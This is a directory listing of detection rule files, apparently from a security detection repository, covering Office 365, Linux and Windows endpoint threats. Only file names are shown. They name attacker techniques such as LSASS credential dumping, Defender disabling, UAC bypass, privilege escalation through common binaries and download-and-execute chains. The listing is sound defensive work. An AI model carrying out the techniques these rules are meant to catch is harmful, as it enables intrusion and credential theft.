│ ├── o365_email_password_and_payroll_compromise_behavior.yml
│ ├── o365_email_receive_and_hard_delete_takeover_behavior.yml
│ ├── o365_email_reported_by_admin_found_malicious.yml
│ ├── o365_email_reported_by_user_found_malicious.yml
│ ├── o365_email_security_feature_changed.yml
│ ├── o365_email_send_and_hard_delete_exfiltration_behavior.yml
│ ├── o365_email_send_and_hard_delete_suspicious_behavior.yml
│ ├── o365_email_send_attachments_excessive_volume.yml
│ ├── o365_email_suspicious_behavior_alert.yml
│ ├── o365_email_suspicious_search_behavior.yml
│ ├── o365_email_transport_rule_changed.yml
│ ├── o365_excessive_authentication_failures_alert.yml
│ ├── o365_excessive_sso_logon_errors.yml
│ ├── o365_exfiltration_via_file_access.yml
│ ├── o365_exfiltration_via_file_download.yml
│ ├── o365_exfiltration_via_file_sync_download.yml
│ ├── o365_external_guest_user_invited.yml
│ ├── o365_external_identity_policy_changed.yml
│ ├── o365_file_permissioned_application_consent_granted_by_user.yml
│ ├── o365_fullaccessasapp_permission_assigned.yml
│ ├── o365_high_number_of_failed_authentications_for_user.yml
│ ├── o365_high_privilege_role_granted.yml
│ ├── o365_mail_permissioned_application_consent_granted_by_user.yml
│ ├── o365_mailbox_email_forwarding_enabled.yml
│ ├── o365_mailbox_folder_read_permission_assigned.yml
│ ├── o365_mailbox_folder_read_permission_granted.yml
│ ├── o365_mailbox_inbox_folder_shared_with_all_users.yml
│ ├── o365_mailbox_read_access_granted_to_application.yml
│ ├── o365_multi_source_failed_authentications_spike.yml
│ ├── o365_multiple_appids_and_useragents_authentication_spike.yml
│ ├── o365_multiple_failed_mfa_requests_for_user.yml
│ ├── o365_multiple_mailboxes_accessed_via_api.yml
│ ├── o365_multiple_os_vendors_authenticating_from_user.yml
│ ├── o365_multiple_service_principals_created_by_sp.yml
│ ├── o365_multiple_service_principals_created_by_user.yml
│ ├── o365_multiple_users_failing_to_authenticate_from_ip.yml
│ ├── o365_new_email_forwarding_rule_created.yml
│ ├── o365_new_email_forwarding_rule_enabled.yml
│ ├── o365_new_federated_domain_added.yml
│ ├── o365_new_forwarding_mailflow_rule_created.yml
│ ├── o365_new_mfa_method_registered.yml
│ ├── o365_oauth_app_mailbox_access_via_ews.yml
│ ├── o365_oauth_app_mailbox_access_via_graph_api.yml
│ ├── o365_privileged_graph_api_permission_assigned.yml
│ ├── o365_privileged_role_assigned.yml
│ ├── o365_privileged_role_assigned_to_service_principal.yml
│ ├── o365_pst_export_alert.yml
│ ├── o365_safe_links_detection.yml
│ ├── o365_security_and_compliance_alert_triggered.yml
│ ├── o365_service_principal_new_client_credentials.yml
│ ├── o365_service_principal_privilege_escalation.yml
│ ├── o365_sharepoint_allowed_domains_policy_changed.yml
│ ├── o365_sharepoint_malware_detection.yml
│ ├── o365_sharepoint_suspicious_search_behavior.yml
│ ├── o365_tenant_wide_admin_consent_granted.yml
│ ├── o365_threat_intelligence_suspicious_email_delivered.yml
│ ├── o365_threat_intelligence_suspicious_file_detected.yml
│ ├── o365_user_consent_blocked_for_risky_application.yml
│ ├── o365_user_consent_denied_for_oauth_application.yml
│ ├── o365_zap_activity_detection.yml
│ └── risk_rule_for_dev_sec_ops_by_repository.yml
├── deprecated
│ ├── .gitkeep
│ ├── certutil_download_with_urlcache_and_split_arguments.yml
│ ├── certutil_download_with_verifyctl_and_split_arguments.yml
│ ├── windows_certutil_download_with_url_argument.yml
│ └── windows_remote_access_software_hunt.yml
├── endpoint
│ ├── 7zip_commandline_to_smb_share_path.yml
│ ├── access_lsass_memory_for_dump_creation.yml
│ ├── active_directory_lateral_movement_identified.yml
│ ├── active_directory_privilege_escalation_identified.yml
│ ├── active_setup_registry_autostart.yml
│ ├── add_defaultuser_and_password_in_registry.yml
│ ├── add_or_set_windows_defender_exclusion.yml
│ ├── adsisearcher_account_discovery.yml
│ ├── allow_file_and_printing_sharing_in_firewall.yml
│ ├── allow_inbound_traffic_by_firewall_rule_registry.yml
│ ├── allow_inbound_traffic_in_firewall_rule.yml
│ ├── allow_network_discovery_in_firewall.yml
│ ├── allow_operation_with_consent_admin.yml
│ ├── anomalous_usage_of_7zip.yml
│ ├── any_powershell_downloadfile.yml
│ ├── any_powershell_downloadstring.yml
│ ├── attacker_tools_on_endpoint.yml
│ ├── attempt_to_add_certificate_to_untrusted_store.yml
│ ├── auto_admin_logon_registry_entry.yml
│ ├── batch_file_write_to_system32.yml
│ ├── bcdedit_command_back_to_normal_mode_boot.yml
│ ├── bcdedit_failure_recovery_modification.yml
│ ├── bits_job_persistence.yml
│ ├── bitsadmin_download_file.yml
│ ├── certutil_exe_certificate_extraction.yml
│ ├── certutil_with_decode_argument.yml
│ ├── change_to_safe_mode_with_network_config.yml
│ ├── chcp_command_execution.yml
│ ├── check_elevated_cmd_using_whoami.yml
│ ├── child_processes_of_spoolsv_exe.yml
│ ├── clear_unallocated_sector_using_cipher_app.yml
│ ├── clop_common_exec_parameter.yml
│ ├── clop_ransomware_known_service_name.yml
│ ├── cmd_carry_out_string_command_parameter.yml
│ ├── cmd_echo_pipe___escalation.yml
│ ├── cmlua_or_cmstplua_uac_bypass.yml
│ ├── cobalt_strike_named_pipes.yml
│ ├── common_ransomware_extensions.yml
│ ├── common_ransomware_notes.yml
│ ├── connectwise_screenconnect_path_traversal.yml
│ ├── connectwise_screenconnect_path_traversal_windows_sacl.yml
│ ├── conti_common_exec_parameter.yml
│ ├── control_loading_from_world_writable_directory.yml
│ ├── create_or_delete_windows_shares_using_net_exe.yml
│ ├── create_remote_thread_in_shell_application.yml
│ ├── create_remote_thread_into_lsass.yml
│ ├── creation_of_lsass_dump_with_taskmgr.yml
│ ├── creation_of_shadow_copy.yml
│ ├── creation_of_shadow_copy_with_wmic_and_powershell.yml
│ ├── credential_dumping_via_copy_command_from_shadow_copy.yml
│ ├── credential_dumping_via_symlink_to_shadow_copy.yml
│ ├── crowdstrike_admin_weak_password_policy.yml
│ ├── crowdstrike_admin_with_duplicate_password.yml
│ ├── crowdstrike_high_identity_risk_severity.yml
│ ├── crowdstrike_medium_identity_risk_severity.yml
│ ├── crowdstrike_medium_severity_alert.yml
│ ├── crowdstrike_multiple_low_severity_alerts.yml
│ ├── crowdstrike_privilege_escalation_for_non_admin_user.yml
│ ├── crowdstrike_user_weak_password_policy.yml
│ ├── crowdstrike_user_with_duplicate_password.yml
│ ├── csc_net_on_the_fly_compilation.yml
│ ├── curl_download_and_bash_execution.yml
│ ├── delete_shadowcopy_with_powershell.yml
│ ├── deleting_shadow_copies.yml
│ ├── detect_azurehound_command_line_arguments.yml
│ ├── detect_azurehound_file_modifications.yml
│ ├── detect_baron_samedit_cve_2021_3156.yml
│ ├── detect_baron_samedit_cve_2021_3156_segfault.yml
│ ├── detect_baron_samedit_cve_2021_3156_via_osquery.yml
│ ├── detect_certify_command_line_arguments.yml
│ ├── detect_certify_with_powershell_script_block_logging.yml
│ ├── detect_certipy_file_modifications.yml
│ ├── detect_computer_changed_with_anonymous_account.yml
│ ├── detect_copy_of_shadowcopy_with_script_block_logging.yml
│ ├── detect_credential_dumping_through_lsass_access.yml
│ ├── detect_empire_with_powershell_script_block_logging.yml
│ ├── detect_excessive_account_lockouts_from_endpoint.yml
│ ├── detect_excessive_user_account_lockouts.yml
│ ├── detect_exchange_web_shell.yml
│ ├── detect_html_help_renamed.yml
│ ├── detect_html_help_url_in_command_line.yml
│ ├── detect_html_help_using_infotech_storage_handlers.yml
│ ├── detect_mimikatz_with_powershell_script_block_logging.yml
│ ├── detect_mshta_inline_hta_execution.yml
│ ├── detect_mshta_renamed.yml
│ ├── detect_mshta_url_in_command_line.yml
│ ├── detect_new_local_admin_account.yml
│ ├── detect_outlook_exe_writing_a_zip_file.yml
│ ├── detect_password_spray_attack_behavior_from_source.yml
│ ├── detect_password_spray_attack_behavior_on_user.yml
│ ├── detect_path_interception_by_creation_of_program_exe.yml
│ ├── detect_prohibited_applications_spawning_cmd_exe.yml
│ ├── detect_psexec_with_accepteula_flag.yml
│ ├── detect_rare_executables.yml
│ ├── detect_rclone_command_line_usage.yml
│ ├── detect_regasm_spawning_a_process.yml
│ ├── detect_regasm_with_network_connection.yml
│ ├── detect_regasm_with_no_command_line_arguments.yml
│ ├── detect_regsvcs_spawning_a_process.yml
│ ├── detect_regsvcs_with_network_connection.yml
│ ├── detect_regsvcs_with_no_command_line_arguments.yml
│ ├── detect_regsvr32_application_control_bypass.yml
│ ├── detect_remote_access_software_usage_file.yml
│ ├── detect_remote_access_software_usage_fileinfo.yml
│ ├── detect_remote_access_software_usage_process.yml
│ ├── detect_remote_access_software_usage_registry.yml
│ ├── detect_renamed_7_zip.yml
│ ├── detect_renamed_psexec.yml
│ ├── detect_renamed_rclone.yml
│ ├── detect_renamed_winrar.yml
│ ├── detect_rtlo_in_file_name.yml
│ ├── detect_rtlo_in_process.yml
│ ├── detect_rundll32_application_control_bypass___advpack.yml
│ ├── detect_rundll32_application_control_bypass___setupapi.yml
│ ├── detect_rundll32_application_control_bypass___syssetup.yml
│ ├── detect_rundll32_inline_hta_execution.yml
│ ├── detect_sharphound_command_line_arguments.yml
│ ├── detect_sharphound_file_modifications.yml
│ ├── detect_sharphound_usage.yml
│ ├── detect_suspicious_processnames_using_pretrained_model_in_dsdl.yml
│ ├── detect_use_of_cmd_exe_to_launch_script_interpreters.yml
│ ├── detect_wmi_event_subscription_persistence.yml
│ ├── detection_of_tools_built_by_nirsoft.yml
│ ├── disable_amsi_through_registry.yml
│ ├── disable_defender_antivirus_registry.yml
│ ├── disable_defender_blockatfirstseen_feature.yml
│ ├── disable_defender_enhanced_notification.yml
│ ├── disable_defender_mpengine_registry.yml
│ ├── disable_defender_spynet_reporting.yml
│ ├── disable_defender_submit_samples_consent_feature.yml
│ ├── disable_etw_through_registry.yml
│ ├── disable_logs_using_wevtutil.yml
│ ├── disable_registry_tool.yml
│ ├── disable_schedule_task.yml
│ ├── disable_security_logs_using_minint_registry.yml
│ ├── disable_show_hidden_files.yml
│ ├── disable_uac_remote_restriction.yml
│ ├── disable_windows_app_hotkeys.yml
│ ├── disable_windows_behavior_monitoring.yml
│ ├── disable_windows_smartscreen_protection.yml
│ ├── disabled_kerberos_pre_authentication_discovery_with_get_aduser.yml
│ ├── disabled_kerberos_pre_authentication_discovery_with_powerview.yml
│ ├── disabling_cmd_application.yml
│ ├── disabling_controlpanel.yml
│ ├── disabling_defender_services.yml
│ ├── disabling_firewall_with_netsh.yml
│ ├── disabling_folderoptions_windows_feature.yml
│ ├── disabling_norun_windows_app.yml
│ ├── disabling_remote_user_account_control.yml
│ ├── disabling_systemrestore_in_registry.yml
│ ├── disabling_task_manager.yml
│ ├── disabling_windows_local_security_authority_defences_via_registry.yml
│ ├── dllhost_with_no_command_line_arguments_with_network.yml
│ ├── dns_exfiltration_using_nslookup_app.yml
│ ├── domain_account_discovery_with_dsquery.yml
│ ├── domain_account_discovery_with_wmic.yml
│ ├── domain_controller_discovery_with_nltest.yml
│ ├── domain_controller_discovery_with_wmic.yml
│ ├── domain_group_discovery_with_adsisearcher.yml
│ ├── domain_group_discovery_with_dsquery.yml
│ ├── domain_group_discovery_with_wmic.yml
│ ├── download_files_using_telegram.yml
│ ├── drop_icedid_license_dat.yml
│ ├── dsquery_domain_discovery.yml
│ ├── dump_lsass_via_comsvcs_dll.yml
│ ├── dump_lsass_via_procdump.yml
│ ├── elevated_group_discovery_with_powerview.yml
│ ├── elevated_group_discovery_with_wmic.yml
│ ├── enable_rdp_in_other_port_number.yml
│ ├── enable_wdigest_uselogoncredential_registry.yml
│ ├── enumerate_users_local_group_using_telegram.yml
│ ├── esentutl_sam_copy.yml
│ ├── etw_registry_disabled.yml
│ ├── eventvwr_uac_bypass.yml
│ ├── excessive_attempt_to_disable_services.yml
│ ├── excessive_distinct_processes_from_windows_temp.yml
│ ├── excessive_file_deletion_in_windefender_folder.yml
│ ├── excessive_number_of_service_control_start_as_disabled.yml
│ ├── excessive_number_of_taskhost_processes.yml
│ ├── excessive_usage_of_cacls_app.yml
│ ├── excessive_usage_of_nslookup_app.yml
│ ├── excessive_usage_of_sc_service_utility.yml
│ ├── excessive_usage_of_taskkill.yml
│ ├── exchange_powershell_abuse_via_ssrf.yml
│ ├── exchange_powershell_module_usage.yml
│ ├── executable_file_written_in_administrative_smb_share.yml
│ ├── executables_or_script_creation_in_suspicious_path.yml
│ ├── executables_or_script_creation_in_temp_path.yml
│ ├── execute_javascript_with_jscript_com_clsid.yml
│ ├── execution_of_file_with_multiple_extensions.yml
│ ├── file_with_samsam_extension.yml
│ ├── firewall_allowed_program_enable.yml
│ ├── first_time_seen_child_process_of_zoom.yml
│ ├── first_time_seen_running_windows_service.yml
│ ├── fodhelper_uac_bypass.yml
│ ├── fsutil_zeroing_file.yml
│ ├── get_addefaultdomainpasswordpolicy_with_powershell.yml
│ ├── get_addefaultdomainpasswordpolicy_with_powershell_script_block.yml
│ ├── get_aduser_with_powershell.yml
│ ├── get_aduser_with_powershell_script_block.yml
│ ├── get_aduserresultantpasswordpolicy_with_powershell.yml
│ ├── get_aduserresultantpasswordpolicy_with_powershell_script_block.yml
│ ├── get_domainpolicy_with_powershell.yml
│ ├── get_domainpolicy_with_powershell_script_block.yml
│ ├── get_domaintrust_with_powershell.yml
│ ├── get_domaintrust_with_powershell_script_block.yml
│ ├── get_domainuser_with_powershell.yml
│ ├── get_domainuser_with_powershell_script_block.yml
│ ├── get_foresttrust_with_powershell.yml
│ ├── get_foresttrust_with_powershell_script_block.yml
│ ├── get_wmiobject_group_discovery.yml
│ ├── get_wmiobject_group_discovery_with_script_block_logging.yml
│ ├── getadcomputer_with_powershell.yml
│ ├── getadcomputer_with_powershell_script_block.yml
│ ├── getadgroup_with_powershell.yml
│ ├── getadgroup_with_powershell_script_block.yml
│ ├── getcurrent_user_with_powershell.yml
│ ├── getcurrent_user_with_powershell_script_block.yml
│ ├── getdomaincomputer_with_powershell.yml
│ ├── getdomaincomputer_with_powershell_script_block.yml
│ ├── getdomaincontroller_with_powershell.yml
│ ├── getdomaincontroller_with_powershell_script_block.yml
│ ├── getdomaingroup_with_powershell.yml
│ ├── getdomaingroup_with_powershell_script_block.yml
│ ├── getlocaluser_with_powershell.yml
│ ├── getlocaluser_with_powershell_script_block.yml
│ ├── getnettcpconnection_with_powershell.yml
│ ├── getnettcpconnection_with_powershell_script_block.yml
│ ├── getwmiobject_ds_computer_with_powershell.yml
│ ├── getwmiobject_ds_computer_with_powershell_script_block.yml
│ ├── getwmiobject_ds_group_with_powershell.yml
│ ├── getwmiobject_ds_group_with_powershell_script_block.yml
│ ├── getwmiobject_ds_user_with_powershell.yml
│ ├── getwmiobject_ds_user_with_powershell_script_block.yml
│ ├── getwmiobject_user_account_with_powershell.yml
│ ├── getwmiobject_user_account_with_powershell_script_block.yml
│ ├── gpupdate_with_no_command_line_arguments_with_network.yml
│ ├── headless_browser_mockbin_or_mocky_request.yml
│ ├── headless_browser_usage.yml
│ ├── hide_user_account_from_sign_in_screen.yml
│ ├── hiding_files_and_directories_with_attrib_exe.yml
│ ├── high_frequency_copy_of_files_in_network_share.yml
│ ├── high_process_termination_frequency.yml
│ ├── hunting_3cxdesktopapp_software.yml
│ ├── icacls_deny_command.yml
│ ├── icacls_grant_command.yml
│ ├── icedid_exfiltrated_archived_file_creation.yml
│ ├── impacket_lateral_movement_commandline_parameters.yml
│ ├── impacket_lateral_movement_smbexec_commandline_parameters.yml
│ ├── impacket_lateral_movement_wmiexec_commandline_parameters.yml
│ ├── interactive_session_on_remote_endpoint_with_powershell.yml
│ ├── java_writing_jsp_file.yml
│ ├── jscript_execution_using_cscript_app.yml
│ ├── kerberoasting_spn_request_with_rc4_encryption.yml
│ ├── kerberos_pre_authentication_flag_disabled_in_useraccountcontrol.yml
│ ├── kerberos_pre_authentication_flag_disabled_with_powershell.yml
│ ├── kerberos_service_ticket_request_using_rc4_encryption.yml
│ ├── kerberos_tgt_request_using_rc4_encryption.yml
│ ├── kerberos_user_enumeration.yml
│ ├── linux_account_manipulation_of_ssh_config_and_keys.yml
│ ├── linux_add_files_in_known_crontab_directories.yml
│ ├── linux_add_user_account.yml
│ ├── linux_adding_crontab_using_list_parameter.yml
│ ├── linux_apt_get_privilege_escalation.yml
│ ├── linux_apt_privilege_escalation.yml
│ ├── linux_at_allow_config_file_creation.yml
│ ├── linux_at_application_execution.yml
│ ├── linux_auditd_add_user_account.yml
│ ├── linux_auditd_add_user_account_type.yml
│ ├── linux_auditd_at_application_execution.yml
│ ├── linux_auditd_auditd_service_stop.yml
│ ├── linux_auditd_base64_decode_files.yml
│ ├── linux_auditd_change_file_owner_to_root.yml
│ ├── linux_auditd_clipboard_data_copy.yml
│ ├── linux_auditd_data_destruction_command.yml
│ ├── linux_auditd_data_transfer_size_limits_via_split.yml
│ ├── linux_auditd_data_transfer_size_limits_via_split_syscall.yml
│ ├── linux_auditd_database_file_and_directory_discovery.yml
│ ├── linux_auditd_dd_file_overwrite.yml
│ ├── linux_auditd_disable_or_modify_system_firewall.yml
│ ├── linux_auditd_doas_conf_file_creation.yml
│ ├── linux_auditd_doas_tool_execution.yml
│ ├── linux_auditd_edit_cron_table_parameter.yml
│ ├── linux_auditd_file_and_directory_discovery.yml
│ ├── linux_auditd_file_permission_modification_via_chmod.yml
│ ├── linux_auditd_file_permissions_modification_via_chattr.yml
│ ├── linux_auditd_find_credentials_from_password_managers.yml
│ ├── linux_auditd_find_credentials_from_password_stores.yml
│ ├── linux_auditd_find_ssh_private_keys.yml
│ ├── linux_auditd_hardware_addition_swapoff.yml
│ ├── linux_auditd_hidden_files_and_directories_creation.yml
│ ├── linux_auditd_insert_kernel_module_using_insmod_utility.yml
│ ├── linux_auditd_install_kernel_module_using_modprobe_utility.yml
│ ├── linux_auditd_kernel_module_enumeration.yml
│ ├── linux_auditd_kernel_module_using_rmmod_utility.yml
│ ├── linux_auditd_nopasswd_entry_in_sudoers_file.yml
│ ├── linux_auditd_osquery_service_stop.yml
│ ├── linux_auditd_possible_access_or_modification_of_sshd_config_file.yml
│ ├── linux_auditd_possible_access_to_credential_files.yml
│ ├── linux_auditd_possible_access_to_sudoers_file.yml
│ ├── linux_auditd_possible_append_cronjob_entry_on_existing_cronjob_file.yml
│ ├── linux_auditd_preload_hijack_library_calls.yml
│ ├── linux_auditd_preload_hijack_via_preload_file.yml
│ ├── linux_auditd_private_keys_and_certificate_enumeration.yml
│ ├── linux_auditd_service_restarted.yml
│ ├── linux_auditd_service_started.yml
│ ├── linux_auditd_setuid_using_chmod_utility.yml
│ ├── linux_auditd_setuid_using_setcap_utility.yml
│ ├── linux_auditd_shred_overwrite_command.yml
│ ├── linux_auditd_stop_services.yml
│ ├── linux_auditd_sudo_or_su_execution.yml
│ ├── linux_auditd_sysmon_service_stop.yml
│ ├── linux_auditd_system_network_configuration_discovery.yml
│ ├── linux_auditd_unix_shell_configuration_modification.yml
│ ├── linux_auditd_unload_module_via_modprobe.yml
│ ├── linux_auditd_virtual_disk_file_and_directory_discovery.yml
│ ├── linux_auditd_whoami_user_discovery.yml
│ ├── linux_awk_privilege_escalation.yml
│ ├── linux_busybox_privilege_escalation.yml
│ ├── linux_c89_privilege_escalation.yml
│ ├── linux_c99_privilege_escalation.yml
│ ├── linux_change_file_owner_to_root.yml
│ ├── linux_clipboard_data_copy.yml
│ ├── linux_common_process_for_elevation_control.yml
│ ├── linux_composer_privilege_escalation.yml
│ ├── linux_cpulimit_privilege_escalation.yml
│ ├── linux_csvtool_privilege_escalation.yml
│ ├── linux_curl_upload_file.yml
│ ├── linux_data_destruction_command.yml
│ ├── linux_dd_file_overwrite.yml
│ ├── linux_decode_base64_to_shell.yml
│ ├── linux_deleting_critical_directory_using_rm_command.yml
│ ├── linux_deletion_of_cron_jobs.yml
│ ├── linux_deletion_of_init_daemon_script.yml
│ ├── linux_deletion_of_services.yml
│ ├── linux_deletion_of_ssl_certificate.yml
│ ├── linux_disable_services.yml
│ ├── linux_doas_conf_file_creation.yml
│ ├── linux_doas_tool_execution.yml
│ ├── linux_docker_privilege_escalation.yml
│ ├── linux_edit_cron_table_parameter.yml
│ ├── linux_emacs_privilege_escalation.yml
│ ├── linux_file_created_in_kernel_driver_directory.yml
│ ├── linux_file_creation_in_init_boot_directory.yml
│ ├── linux_file_creation_in_profile_directory.yml
│ ├── linux_find_privilege_escalation.yml
│ ├── linux_gdb_privilege_escalation.yml
│ ├── linux_gem_privilege_escalation.yml
│ ├── linux_gnu_awk_privilege_escalation.yml
│ ├── linux_hardware_addition_swapoff.yml
│ ├── linux_high_frequency_of_file_deletion_in_boot_folder.yml
│ ├── linux_high_frequency_of_file_deletion_in_etc_folder.yml
│ ├── linux_impair_defenses_process_kill.yml
│ ├── linux_indicator_removal_clear_cache.yml
│ ├── linux_indicator_removal_service_file_deletion.yml
│ ├── linux_ingress_tool_transfer_hunting.yml
│ ├── linux_ingress_tool_transfer_with_curl.yml
│ ├── linux_insert_kernel_module_using_insmod_utility.yml
│ ├── linux_install_kernel_module_using_modprobe_utility.yml
│ ├── linux_iptables_firewall_modification.yml
│ ├── linux_java_spawning_shell.yml
│ ├── linux_kernel_module_enumeration.yml
│ ├── linux_kworker_process_in_writable_process_path.yml
│ ├── linux_make_privilege_escalation.yml
│ ├── linux_mysql_privilege_escalation.yml
│ ├── linux_ngrok_reverse_proxy_usage.yml
│ ├── linux_node_privilege_escalation.yml
│ ├── linux_nopasswd_entry_in_sudoers_file.yml
│ ├── linux_obfuscated_files_or_information_base64_decode.yml
│ ├── linux_octave_privilege_escalation.yml
│ ├── linux_openvpn_privilege_escalation.yml
│ ├── linux_persistence_and_privilege_escalation_risk_behavior.yml
│ ├── linux_php_privilege_escalation.yml
│ ├── linux_pkexec_privilege_escalation.yml
│ ├── linux_possible_access_or_modification_of_sshd_config_file.yml
│ ├── linux_possible_access_to_credential_files.yml
│ ├── linux_possible_access_to_sudoers_file.yml
│ ├── linux_possible_append_command_to_at_allow_config_file.yml
│ ├── linux_possible_append_command_to_profile_config_file.yml
│ ├── linux_possible_append_cronjob_entry_on_existing_cronjob_file.yml
│ ├── linux_possible_cronjob_modification_with_editor.yml
│ ├── linux_possible_ssh_key_file_creation.yml
│ ├── linux_preload_hijack_library_calls.yml
│ ├── linux_proxy_socks_curl.yml
│ ├── linux_puppet_privilege_escalation.yml
│ ├── linux_rpm_privilege_escalation.yml
│ ├── linux_ruby_privilege_escalation.yml
│ ├── linux_service_file_created_in_systemd_directory.yml
│ ├── linux_service_restarted.yml
│ ├── linux_service_started_or_enabled.yml
│ ├── linux_setuid_using_chmod_utility.yml
│ ├── linux_setuid_using_setcap_utility.yml
│ ├── linux_shred_overwrite_command.yml
│ ├── linux_sqlite3_privilege_escalation.yml
│ ├── linux_ssh_authorized_keys_modification.yml
│ ├── linux_ssh_remote_services_script_execute.yml
│ ├── linux_stdout_redirection_to_dev_null_file.yml
│ ├── linux_stop_services.yml
│ ├── linux_sudo_or_su_execution.yml
│ ├── linux_sudoers_tmp_file_creation.yml
│ ├── linux_system_network_discovery.yml
│ ├── linux_system_reboot_via_system_request_key.yml
│ ├── linux_unix_shell_enable_all_sysrq_functions.yml
│ ├── linux_visudo_utility_execution.yml
│ ├── living_off_the_land_detection.yml
│ ├── loading_of_dynwrapx_module.yml
│ ├── local_account_discovery_with_wmic.yml
│ ├── log4shell_cve_2021_44228_exploitation.yml
│ ├── logon_script_event_trigger_execution.yml
│ ├── lolbas_with_network_traffic.yml
│ ├── macos___re_opened_applications.yml
│ ├── macos_amos_stealer___virtual_machine_check_activity.yml
│ ├── macos_lolbin.yml
│ ├── macos_plutil.yml
│ ├── mailsniper_invoke_functions.yml
│ ├── malicious_inprocserver32_modification.yml
│ ├── malicious_powershell_executed_as_a_service.yml
│ ├── malicious_powershell_process___encoded_command.yml
│ ├── malicious_powershell_process___execution_policy_bypass.yml
│ ├── malicious_powershell_process_with_obfuscation_techniques.yml
│ ├── microsoft_defender_atp_alerts.yml
│ ├── microsoft_defender_incident_alerts.yml
│ ├── mimikatz_passtheticket_commandline_parameters.yml
│ ├── mmc_lolbas_execution_process_spawn.yml
│ ├── modification_of_wallpaper.yml
│ ├── modify_acl_permission_to_files_or_folder.yml
│ ├── monitor_registry_keys_for_print_monitors.yml
│ ├── moveit_certificate_store_access_failure.yml
│ ├── moveit_empty_key_fingerprint_authentication_attempt.yml
│ ├── ms_exchange_mailbox_replication_service_writing_active_server_pages.yml
│ ├── ms_scripting_process_loading_ldap_module.yml
│ ├── ms_scripting_process_loading_wmi_module.yml
│ ├── msbuild_suspicious_spawned_by_script_process.yml
│ ├── mshta_spawning_rundll32_or_regsvr32_process.yml
│ ├── msi_module_loaded_by_non_system_binary.yml
│ ├── msmpeng_application_dll_side_loading.yml
│ ├── net_profiler_uac_bypass.yml
│ ├── network_connection_discovery_with_arp.yml
│ ├── network_connection_discovery_with_netstat.yml
│ ├── network_discovery_using_route_windows_app.yml
│ ├── network_share_discovery_via_dir_command.yml
│ ├── network_traffic_to_active_directory_web_services_protocol.yml
│ ├── nishang_powershelltcponeline.yml
│ ├── nltest_domain_trust_discovery.yml
│ ├── non_chrome_process_accessing_chrome_default_dir.yml
│ ├── non_firefox_process_access_firefox_profile_dir.yml
│ ├── notepad_with_no_command_line_arguments.yml
│ ├── ntdsutil_export_ntds.yml
│ ├── outbound_network_connection_from_java_using_default_ports.yml
│ ├── overwriting_accessibility_binaries.yml
│ ├── papercut_ng_suspicious_behavior_debug_log.yml
│ ├── permission_modification_using_takeown_app.yml
│ ├── petitpotam_network_share_access_request.yml
│ ├── petitpotam_suspicious_kerberos_tgt_request.yml
│ ├── ping_sleep_batch_command.yml
│ ├── possible_browser_pass_view_parameter.yml
│ ├── possible_lateral_movement_powershell_spawn.yml
│ ├── potential_password_in_username.yml
│ ├── potential_system_network_configuration_discovery_activity.yml
│ ├── potential_telegram_api_request_via_commandline.yml
│ ├── potentially_malicious_code_on_commandline.yml
│ ├── powershell_4104_hunting.yml
│ ├── powershell___connect_to_internet_with_hidden_window.yml
│ ├── powershell_com_hijacking_inprocserver32_modification.yml
│ ├── powershell_creating_thread_mutex.yml
│ ├── powershell_disable_security_monitoring.yml
│ ├── powershell_domain_enumeration.yml
│ ├── powershell_enable_powershell_remoting.yml
│ ├── powershell_enable_smb1protocol_feature.yml
│ ├── powershell_execute_com_object.yml
│ ├── powershell_fileless_process_injection_via_getprocaddress.yml
│ ├── powershell_fileless_script_contains_base64_encoded_content.yml
│ ├── powershell_get_localgroup_discovery.yml
│ ├── powershell_get_localgroup_discovery_with_script_block_logging.yml
│ ├── powershell_invoke_cimmethod_cimsession.yml
│ ├── powershell_invoke_wmiexec_usage.yml
│ ├── powershell_load_module_in_meterpreter.yml
│ ├── powershell_loading_dotnet_into_memory_via_reflection.yml
│ ├── powershell_processing_stream_of_data.yml
│ ├── powershell_remote_services_add_trustedhost.yml
│ ├── powershell_remote_thread_to_known_windows_process.yml
│ ├── powershell_remove_windows_defender_directory.yml
│ ├── powershell_script_block_with_url_chain.yml
│ ├── powershell_start_bitstransfer.yml
│ ├── powershell_start_or_stop_service.yml
│ ├── powershell_using_memory_as_backing_store.yml
│ ├── powershell_webrequest_using_memory_stream.yml
│ ├── powershell_windows_defender_exclusion_commands.yml
│ ├── prevent_automatic_repair_mode_using_bcdedit.yml
│ ├── print_processor_registry_autostart.yml
│ ├── print_spooler_adding_a_printer_driver.yml
│ ├── print_spooler_failed_to_load_a_plug_in.yml
│ ├── process_creating_lnk_file_in_suspicious_location.yml
│ ├── process_deleting_its_process_file_path.yml
│ ├── process_execution_via_wmi.yml
│ ├── process_kill_base_on_file_path.yml
│ ├── process_writing_dynamicwrapperx.yml
│ ├── processes_launching_netsh.yml
│ ├── processes_tapping_keyboard_events.yml
│ ├── randomly_generated_scheduled_task_name.yml
│ ├── randomly_generated_windows_service_name.yml
│ ├── ransomware_notes_bulk_creation.yml
│ ├── recon_avproduct_through_pwh_or_wmi.yml
│ ├── recon_using_wmi_class.yml
│ ├── recursive_delete_of_directory_in_batch_cmd.yml
│ ├── reg_exe_manipulating_windows_services_registry_keys.yml
│ ├── registry_keys_for_creating_shim_databases.yml
│ ├── registry_keys_used_for_persistence.yml
│ ├── registry_keys_used_for_privilege_escalation.yml
│ ├── regsvr32_silent_and_install_param_dll_loading.yml
│ ├── regsvr32_with_known_silent_switch_cmdline.yml
│ ├── remcos_client_registry_install_entry.yml
│ ├── remcos_rat_file_creation_in_remcos_folder.yml
│ ├── remote_desktop_process_running_on_system.yml
│ ├── remote_process_instantiation_via_dcom_and_powershell.yml
│ ├── remote_process_instantiation_via_dcom_and_powershell_script_block.yml
│ ├── remote_process_instantiation_via_winrm_and_powershell.yml
│ ├── remote_process_instantiation_via_winrm_and_powershell_script_block.yml
│ ├── remote_process_instantiation_via_winrm_and_winrs.yml
│ ├── remote_process_instantiation_via_wmi.yml
│ ├── remote_process_instantiation_via_wmi_and_powershell.yml
│ ├── remote_process_instantiation_via_wmi_and_powershell_script_block.yml
│ ├── remote_system_discovery_with_adsisearcher.yml
│ ├── remote_system_discovery_with_dsquery.yml
│ ├── remote_system_discovery_with_wmic.yml
│ ├── remote_wmi_command_attempt.yml
│ ├── resize_shadowstorage_volume.yml
│ ├── revil_common_exec_parameter.yml
│ ├── revil_registry_entry.yml
│ ├── rubeus_command_line_parameters.yml
│ ├── rubeus_kerberos_ticket_exports_through_winlogon_access.yml
│ ├── runas_execution_in_commandline.yml
│ ├── rundll32_control_rundll_hunt.yml
│ ├── rundll32_control_rundll_world_writable_directory.yml
│ ├── rundll32_create_remote_thread_to_a_process.yml
│ ├── rundll32_createremotethread_in_browser.yml
│ ├── rundll32_lockworkstation.yml
